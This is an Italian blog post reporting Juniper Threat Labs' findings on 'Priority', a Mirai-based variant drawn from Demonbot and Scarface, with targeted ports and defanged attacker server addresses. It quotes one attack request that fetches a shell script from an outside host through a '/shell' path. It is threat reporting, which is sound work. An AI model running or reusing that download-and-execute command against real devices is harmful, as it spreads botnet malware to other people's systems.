hacker costruisce una variante di uno dei malware più pericolosi
Buongiorno cari lettori, oggi parleremo di un hacker ha creato una versione modificata di un malware pericolosissimo.
Il codice sorgente di Mirai è trapelato nel settembre 2016, sulla comunità di hacker Hackforums.
Proprio come il mondo del software legittimo, dove il codice è disponibile in abbondanza come open-source per gli sviluppatori, questa è una dura realtà anche nel mondo della criminalità informatica.
Alla luce di ciò, di recente, è stato trovato un attore di minacce che utilizza il famigerato codice sorgente del malware Mirai per lanciare la propria versione del malware da parte dei ricercatori di Juniper Threat Labs.
Secondo i ricercatori, la versione in discussione si basa su 2 varianti di Mirai in particolare, ovvero Demonbot e Scarface. La prima è costruita per prendere di mira Hadoop, mentre la seconda prende di mira i dispositivi IoT insieme all'inclusione di backdoor per mantenere l'accesso persistente.
Sfruttando queste 2 varianti, l'aggressore ha utilizzato un comando singolare, "GET /shell?cd%20/tmp;%20wget%20http://45(.)13.58.4/TPJ.sh;" per mirare alle seguenti porte:
5500
5501
5502
5050
60001
Vale la pena di notare che il 6001 è il primo porto ad essere attaccato e si ritiene che sia anche il primo obiettivo del gruppo di minaccia.
Dal momento che Priority utilizza solo un singolo exploit, ci può essere una ragione per credere che l'attaccante non sia un attore sofisticato. Non dovrebbe essere una sorpresa, dato che il codice open-source e l'accesso a Internet permette virtualmente a chiunque abbia un po' di know-how di condurre tali attacchi.
Con gli aggressori attivi dal 10 settembre 2020, come mostra il grafico sopra riportato, il loro server è stato trovato all'indirizzo IP 128(.)199.15.87 e 64(.)227.97.145 ospitati nel centro dati di Santa Clara di Digital Ocean. Spiegando qui la scelta dell'aggressore, i ricercatori di Juniper hanno dichiarato in un post del blog che:
Digital Ocean è un noto fornitore di VPS che consente una rapida configurazione e distruzione dei Virtual Private Server. Questi server sono un pilastro per gli hacker per lanciare i loro attacchi a comparsa e poi distruggere i loro server a basso costo.
Oltre a ciò, un altro provider VPS di nome Heficed è stato utilizzato per ospitare il malware stesso.
Per concludere, attualmente questa nuova variante è stata denominata Trojan.Mirai.6981169 da Juniper Labs e Priority sembra per il momento inattiva.
Questo è solo un altro esempio di come la semplice lotta contro il principale malware alias Mirai non sarà sufficiente, poiché le varianti che emergono da questi progetti sono sempre nuove minacce. Pertanto, i professionisti della sicurezza informatica devono essere preparati a vedere non solo più varianti di Mirai, ma anche altri malware.
spero che questo articolo vi sia piaciuto noi ci vediamo ad un prossimo articolo.
